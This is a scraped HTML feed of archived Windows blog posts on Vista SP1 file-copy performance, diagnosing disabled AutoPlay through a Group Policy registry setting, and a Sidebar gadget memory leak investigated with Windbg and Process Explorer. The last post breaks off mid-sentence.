<FONT size="3"> <FONT face="Calibri"> Perhaps the biggest drawback of the algorithm, and the one that has caused many Vista users to complain, is that for copies involving a large group of files between 256KB and tens of MB in size, the perceived performance of the copy can be significantly worse than on Windows XP. That’s because the previous algorithm’s use of cached file I/O lets Explorer finish writing destination files to memory and dismiss the copy dialog long before the Cache Manager’s write-behind thread has actually committed the data to disk; with Vista’s non-cached implementation, Explorer is forced to wait for each write operation to complete before issuing more, and ultimately for all copied data to be on disk before indicating a copy’s completion. In Vista, Explorer also waits 12 seconds before making an estimate of the copy’s duration and the estimation algorithm is sensitive to fluctuations in the copy speed, both of which exacerbate user frustration with slower copies. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <B style="mso-bidi-font-weight: normal"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> SP1 Improvements </FONT></FONT></SPAN></B></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> During Vista SP1’s development, the product team decided to revisit the copy engine to explore ways to improve both the real and perceived performance of copy operations for the cases that suffered in the new implementation. The biggest change they made was to go back to using cached file I/O again for all file copies, both local and remote, with one exception that I’ll describe shortly. With caching, perceived copy time and the publishing scenario both improve. However, several significant changes in both the file copy algorithm and the platform were required to address the shortcomings of cached I/O I’ve already noted. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The one case where the SP1 file copy engine doesn't use caching is for remote file copies, where it prevents the double-caching problem by leveraging support in the Windows client-side remote file system driver, Rdbss.sys. It does so by issuing a command to the driver that tells it not to cache a remote file on the local system as it is being read or written. You can see the command being issued by Explorer in the following Process Monitor capture: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815681/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815681/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121013i35645BAF8C61613E" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Another enhancement for remote copies is the pipelined I/Os issued by the SMB2 file system driver, srv2.sys, which is new to Windows Vista and Windows Server 2008. Instead of issuing 60KB I/Os across the network like the original SMB implementation, SMB2 issues pipelined 64KB I/Os so that when it receives a large I/O from an application, it will issue multiple 64KB I/Os concurrently, allowing for the data to stream to or from the remote system with fewer latency stalls. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The copy engine also issues four initial I/Os of sizes ranging from 128KB to 1MB, depending on the size of the file being copied, which triggers the Cache Manager read-ahead thread to issue large I/Os. The platform change made in SP1 to the Cache Manager has it perform larger I/O for both read-ahead and write-behind. The larger I/Os are only possible because of work done in the original Vista I/O system to support I/Os larger than 64KB, which was the limit in previous versions of Windows. Larger I/Os also improve performance on local copies because there are fewer disk accesses and disk seeks, and it enables the Cache Manager write-behind thread to better keep up with the rate at which memory fills with copied file data. That reduces, though not necessarily eliminates, memory pressure that causes active memory contents to be discarded during a copy. Finally, for remote copies the large I/Os let the SMB2 driver use pipelining. The Cache Manager issues read I/Os that are twice the size of the I/O issued by the application, up to a maximum of 2MB on Vista and 16MB on Server 2008, and write I/Os of up to 1MB in size on Vista and up to 32MB on Server 2008. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> This trace excerpt of a 16MB file copy from one SP1 system to another shows 1MB I/Os issued by Explorer and a 2MB Cache Manager read-ahead, which is distinguished by its non-cached I/O flag: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG height="116" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815685/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815685/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121014i62D19E5C89767007" style="WIDTH: 550px; HEIGHT: 116px" width="550" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Unfortunately, the SP1 changes, while delivering consistently better performance than previous versions of Windows, can be slower than the original Vista release in a couple of specific cases. The first is when copying to or from a Server 2003 system over a slow network. The original Vista copy engine would deliver a high-speed copy, but, because of the out-of-order I/O problem I mentioned earlier, trigger pathologic behavior in the Server 2003 Cache Manager that could cause all of the server’s memory to be filled with copied file data. The SP1 copy engine changes avoid that, but because the engine&nbsp;issues 32KB I/Os instead of 60KB I/Os, the throughput it achieves on high-latency connections can approach half of what the original Vista release achieved. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The other case where SP1 might not perform as well as original Vista is for large file copies on the same volume. Since SP1 issues smaller I/Os, primarily to allow the rest of the system to have better access to the disk and hence better responsiveness during a copy, the number of disk head seeks between reads from the source and writes to the destination files can be higher, especially on disks that don’t avoid seeks with efficient internal queuing algorithms. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> One final SP1 change worth mentioning is that Explorer makes copy duration estimates much sooner than the original Vista release and the estimation algorithm is more accurate. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <B style="mso-bidi-font-weight: normal"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Summary </FONT></FONT></SPAN></B></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> File copying is not as easy as it might first appear, but the product team took feedback they got from Vista customers very seriously and spent hundreds of hours evaluating different approaches and tuning the final implementation to restore most copy scenarios to at least the performance of previous versions of Windows and drastically improve some key scenarios. The changes apply both to Explorer copies as well as to ones initiated by applications using the <A class="" href="#" mce_href="#" target="_blank"> CopyFileEx </A> API and you’ll see the biggest improvements over older versions of Windows when copying files on high-latency, high-bandwidth networks where the large I/Os, SMB2’s I/O pipelining, and Vista’s TCP/IP stack receive-window auto-tuning can literally deliver what would be a ten minute copy on Windows XP or Server 2003 in one minute. Pretty cool. </FONT></FONT></SPAN></P><P> </P> <P></P> </BODY></HTML> Thu, 27 Jun 2019 06:38:12 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/inside-vista-sp1-file-copy-improvements/ba-p/723622 MarkRussinovich 2019-06-27T06:38:12Z The Case of the Missing AutoPlay https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-missing-autoplay/ba-p/723613 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 31, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <B style="mso-bidi-font-weight: normal"> <FONT size="3"> <FONT face="Calibri"> </FONT></FONT></B></P><P> </P> <FONT face="Calibri" size="3"> I’ve been presenting talks on Windows Vista kernel changes since TechEd US in the summer of 2006 and one of the features I cover in the session is ReadyBoost, a write-through disk caching technology that can potentially improve system performance by leveraging flash media as a disk cache. I explain ReadyBoost in depth in my TechNet Magazine article, “ <A class="" href="#" mce_href="#" target="_blank"> Inside the Windows Vista Kernel: Part 2 </A> ”, </FONT> <FONT face="Calibri" size="3"> but the basic idea is that, since flash has significantly better random access latency than disk, ReadyBoost intercepts disk accesses and directs random-access reads to its cache when the cache holds the data, but sends sequential access to directly to the disk. During my presentation, I insert a USB key, whereupon Windows displays an AutoPlay dialog that includes an option to configure the device for ReadyBoost caching: </FONT> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <SHAPETYPE coordsize="21600,21600" filled="f" id="_x0000_t75" preferrelative="t" spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"> <STROKE joinstyle="miter"> </STROKE> <FORMULAS> <F eqn="if lineDrawn pixelLineWidth 0"> </F> <F eqn="sum @0 1 0"> </F> <F eqn="sum 0 0 @1"> </F> <F eqn="prod @2 1 2"> </F> <F eqn="prod @3 21600 pixelWidth"> </F> <F eqn="prod @3 21600 pixelHeight"> </F> <F eqn="sum @0 0 1"> </F> <F eqn="prod @6 1 2"> </F> <F eqn="prod @7 21600 pixelWidth"> </F> <F eqn="sum @8 21600 0"> </F> <F eqn="prod @7 21600 pixelHeight"> </F> <F eqn="sum @10 21600 0"> </F> </FORMULAS> <PATH gradientshapeok="t" connecttype="rect" extrusionok="f"> </PATH> <LOCK aspectratio="t" ext="edit"> </LOCK> </SHAPETYPE> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="237" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696756/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696756/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121000i36FEFD9A04DB0E6C" style="WIDTH: 334px; HEIGHT: 237px" width="334" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The first time I gave the talk, the demonstration went flawlessly, but in subsequent deliveries I didn’t get the AutoPlay experience. I would notice the lack of AutoPlay as I ran through the demonstrations before a session, but was always pressed for time and so couldn’t investigate. As a workaround, I would manual open the properties dialog of the device’s volume after insertion to show the ReadyBoost page that’s displayed when you click on the “Speed up my system” link on the AutoPlay dialog. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The last time I presented the session, at TechEd/ITforum in Barcelona in November, I had some extra time beforehand so I decided to find out why AutoPlay wasn’t working. The first thing I did was to check the AutoPlay settings, which you configure in the AutoPlay section of the Control Panel’s Hardware and Sound page. Some of the entries were set to “Ask me every time”, which shouldn’t have had any effect, and even after resetting to the defaults, AutoPlay still didn’t work: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="210" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696759/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696759/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121001i56E105F5CC83B311" style="WIDTH: 550px; HEIGHT: 210px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> At this point I had to look under the hood at an insertion’s associated Registry and file system activity to see if that would reveal the reason why Explorer wasn’t honoring the Control Panel’s AutoPlay settings. I ran <A class="" href="#" mce_href="#" target="_blank"> Process Monitor </A> , configured the filter to include Explorer’s Registry operations, and re-inserted the key. Then I stopped the capture and looked at what Process Monitor had collected. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A staggering 22,000 events meant that scanning through the trace event-by-event would take hours and there were no obvious error codes to search for, so I had to think of some keyword that might lead me to the relevant lines. I first searched for “autoplay”, but came up empty. I knew that Explorer looks for a file named Autorun.inf in the root directory of removable media volumes, which can contain pointers to an icon to show for the volume and an executable that launches when the user double-clicks on the volume, so I next searched for “autorun”. The first hit didn’t look interesting because it referred to the volume’s mount-point GUID, information that Windows generates dynamically when it notices a new volume: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="70" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696763/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696763/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121002i866E36E70DD133F2" style="WIDTH: 550px; HEIGHT: 70px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The next hits were just a few entries later and all referred to values that store Group Policy settings: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="119" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696764/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696764/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121003iE9336E5A8B48817E" style="WIDTH: 550px; HEIGHT: 119px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The queries of the first two locations resulted in NAME NOT FOUND errors, indicating that the policies weren’t defined, but a query of HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun was successful. Process Monitor showed the value Explorer had read in the Details column: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="107" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696766/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696766/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121004iD36F3F0CDDCF4DDD" style="WIDTH: 251px; HEIGHT: 107px" width="251" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I didn’t know how to interpret a setting of 255, so I executed a Web search for “nodrivetypeautorun” and found <A class="" href="#" mce_href="#" target="_blank"> a page </A> in the Windows 2000 Resource Kit </FONT> <FONT face="Calibri" size="3"> that describes the value as a bitmask specifying which device types have AutoPlay disabled. A value of 255 decimal (0xFF hexadecimal) disables AutoPlay on all devices: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="119" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696767/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696767/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121005iD6003E07A529611E" style="WIDTH: 360px; HEIGHT: 119px" width="360" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I used Process Monitor’s Jump-To functionality to launch Regedit and navigate directly to the value, opened the value editor, and changed the setting to 0 to enable AutoPlay on all devices. Next I had to test the change. I removed and reinserted the key and, to my satisfaction, the AutoPlay dialog appeared. Note that on Windows Vista, AutoPlay no longer means "automatically execute what's in Autorun.inf", but rather, "show me my options", so I wasn't introcuding a potential&nbsp;security issue. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The case was almost closed, but I had one detail to wrap up. AutoPlay was disabled on my system by the Group Policy configuration of the Microsoft domain to which the system is joined. That explained why the demonstration had worked for the first few times: my first deliveries of the session were before I had joined Microsoft. It also meant that the value would get restored to its previous setting the next time I logged on and Group Policy reapplied the domain’s configuration. If I happened to logon before the session the demonstration would break again. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> There’s no way to opt out of Group Policy updates short of removing the system from the domain or never connecting to the domain. However, because I have local administrative rights, I realized that I could prevent Group Policy from changing the value by setting the permissions on the policy’s key such that Group Policy wouldn’t have permission to do so. Group Policy processing occurs in the Local System account, so I opened Regedit’s permissions editor and removed write access for the Local System account: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="371" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696768/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696768/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121006iBE487CE107D4D621" style="WIDTH: 294px; HEIGHT: 371px" width="294" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I was now confident that the demonstration would work for my current delivery of the Vista Kernel Changes session, as well as any future ones, and I closed the case. Besides highlighting Process Monitor’s usefulness for uncovering a root cause, this example also illustrates the power of local administrative rights. A local administrator is the master of the computer and is able to do anything they want, including circumventing domain policies, something I covered in a <A class="" href="#" mce_href="#" target="_blank"> previous blog post </A> , and that's just one more reason enterprises should strive to have their end users run as standard users. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:37:12 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-missing-autoplay/ba-p/723613 MarkRussinovich 2019-06-27T06:37:12Z The Case of the Frozen Clock Gadget https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-frozen-clock-gadget/ba-p/723605 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 15, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Besides Aero Glass, one of the most visible features of Windows Vista is the Sidebar with its set of default Gadgets, like the clock, RSS feed, and photo viewer. The convenience of having frequently-accessed information on the desktop and the ease of their development has led to the availability of literally thousands of third-party Gadgets through sites like the <A class="" href="#" mce_href="#" target="_blank"> Windows Vista Gadget Gallery </A> </FONT> <FONT face="Calibri" size="3"> . I’ve downloaded and installed a few out of curiosity, and in some cases kept them in my Sidebar’s standard configuration, and never experienced a problem. <SPAN style="mso-spacerun: yes"> </SPAN> A few days after installing a batch of new Gadgets, however, I noticed that a third-party clock Gadget had stopped updating, and so I set out to investigate. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> My system was otherwise functioning normally, so my first step was to see if something was amiss with the Sidebar’s configuration. I right-clicked on the Sidebar screen area and selected the Properties menu item, but instead of displaying the Sidebar configuration dialog, the Sidebar crashed: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="291" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178594/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178594/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120992iEB70A1509CA2F74D" style="WIDTH: 484px; HEIGHT: 291px" width="484" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Gadgets run inside of shared Sidebar processes, so my first thought was that memory corruption in the Sidebar process had caused the clock to stop and subsequent crash, and verifying that theory required that I analyze the crash. The Windows Error Reporting (WER) service creates a crash-dump file, which is the saved state of a faulting process, in case you agree to send information to Microsoft about a problem. I clicked open the View Details area to see where Windows had saved the dump: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="375" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178596/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178596/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120993i987318845BCBB51D" style="WIDTH: 440px; HEIGHT: 375px" width="440" /> </FONT> </P> <SPAN style="mso-no-proof: yes"> </SPAN> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The last path displayed by the dialog, WERD8EE.tmp.mdmp, is a dump file, so I launched the <A class="" href="#" mce_href="#" target="_blank"> Microsoft Debugging Tools for Windows Windbg </A> </FONT> <FONT face="Calibri" size="3"> utility and opened the file. When you open a dump file, Windbg automatically shows you the instruction that ultimately lead to the crash. In this case, it was a memory copy operation in Msvcrt, the Microsoft C Runtime: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="92" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178598/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178598/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120994iA0052B0681635540" style="WIDTH: 550px; HEIGHT: 92px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The right side of the line showing the instruction indicates that the target address of the copy is 0. When a memory resource is exhausted, memory-allocation functions typically return address 0, also known as a NULL pointer, because that’s an illegal address by default for a Windows process (an application can manually create read/write memory at address zero, but in general it’s not done). The fact that Sidebar referenced address 0 didn’t conclusively mean the crash was due to low-memory instead of corruption, but it appeared likely. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I next looked at the code that led to the crash, which would tell me if it was a Gadget or the Sidebar itself that had passed a NULL pointer to the C Runtime. To do so, I opened Windbg’s stack dialog: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="303" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178601/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178601/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120995i0D14989A51DBE9E9" style="WIDTH: 497px; HEIGHT: 303px" width="497" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I had previously configured Windbg’s symbol path to point at the <A class="" href="#" mce_href="#" target="_blank"> Microsoft symbol server </A> </FONT> <FONT face="Calibri" size="3"> so that Windbg reports names of internal functions in Windows images, because knowing function names can often make understanding a dump file easier. The functions listed in the stack trace implied that Sidebar was querying the version of a “package” when it crashed. I’m not sure what the Sidebar calls a package, but the trace did seem to show that Sidebar was the culprit, not a Gadget. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> So had Sidebar run out of memory? There are several types of resource exhaustion that can cause a memory allocation to fail. For example, the system could have run out of committable memory, the process could have consumed all the memory in its own address space, or an internal heap could have reached its maximum size. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I started by checking the committed memory, since that was quick. Total commitable memory, also known as the commit limit, is the sum of the paging file(s) and most of physical memory. When commitable memory runs low, Windows Vista’s low-resource watchdog warns you by presenting a list of processes consuming the most memory and gives you the option of terminating them to relieve the memory pressure. I hadn’t seen a warning, so I doubted that this was the cause, but opened <A class="" href="#" mce_href="#" target="_blank"> Process Explorer’s </A> System Information dialog to check anyway: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="130" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178602/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178602/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120996i265B7740F8992DB1" style="WIDTH: 191px; HEIGHT: 130px" width="191" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As I suspected, there was plenty of available Committable memory. I next looked at Sidebar’s virtual memory usage. Memory leaks are caused when a process allocates virtual memory, stores some data in it, uses the data, but doesn’t free the memory when it’s done with the data. Virtual memory that processes allocate to store their own data is called Private Bytes, so I opened Process Explorer and added the Private Bytes column: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="227" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178605/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178605/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120997iE1BCDDF4F76B4E1F" style="WIDTH: 550px; HEIGHT: 227px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> On a 32-bit Windows system, processes have 2 GB of address space available to them by default, so the highest possible Private Bytes value is close to 2 GB, which is exactly what the Sidebar process with process ID 4680 had consumed. That confirmed it: a memory leak in Sidebar caused it to run out of address space, which in turned caused a memory allocation to fail, which finally caused a NULL-pointer reference and a crash. I suspect that the clock stopped when Sidebar’s address space was exhausted and the clock Gadget couldn’t allocate resources to update its graphic. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Next I had to determine which Gadget was causing the leak, which may or may not have been the frozen clock Gadget. The Sidebar consists of two processes, one Sidebar.exe process that hosts the Windows Gadgets and a child Sidebar.exe process for third-party Gadgets. At this point I knew that a third-party Gadget had leaked memory or caused the Sidebar to leak, but I had several third-party 